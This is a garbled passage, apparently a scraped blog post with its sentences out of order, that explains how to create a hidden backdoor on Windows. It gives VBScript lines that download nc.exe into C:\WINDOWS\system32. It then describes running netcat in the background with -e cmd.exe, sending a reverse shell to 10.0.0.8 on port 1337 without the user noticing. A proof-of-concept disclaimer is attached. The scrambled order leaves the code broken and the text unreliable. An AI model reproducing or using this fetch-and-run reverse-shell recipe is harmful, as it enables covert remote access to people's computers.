2.3 Setting up a one-shot webserver on port 8080 to present the content of a file.2.1 Opening a raw connection to port 25.Set objShell = CreateObject("WScript.Shell") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Createobject("Scripting.FileSystemObject") ObjADOStream.Position = 0 'Set the stream position to the start
ObjADOStream.Write objXMLHTTP.ResponseBody Set objADOStream = CreateObject("ADODB.Stream") Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") StrHDLocation = "C:\WINDOWS\system32\nc.exe" Here's an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server: The user won't even know it's running without checking the process list. The -d switch tells netcat to run in the background in a Windows environment. The -e switch tells netcat to execute cmd.exe and output it to the server waiting for the connection. What this does is tell netcat to connect to the IP 10.0.0.8 on TCP port 1337. That's when we tell the script to run the following netcat command: To do that just run a simple command such as: To set this up, you need to have a computer running netcat waiting for the incomming connection. Only use this in your own test environment and I take no responsibility if you mess something up with this*** ***This is a proof of concept and should not be used for illegal purposes. Once the file is in the system32 folder it can simple be run from any command prompt. What this does is allow you to run netcat from the command line without dealing with the full location of nc.exe. It's a very basic concept and all it does it download the netcat program (nc.exe) from a trusted website into the users c:\windows\system32 folder. Using VBScript and netcat it is quite simple to create a basic backdoor into a users system with the priviledges of the user that ran the script. Download nc111nt.zip (password:nc) - Netcat for Windows
0 kommentar(er)
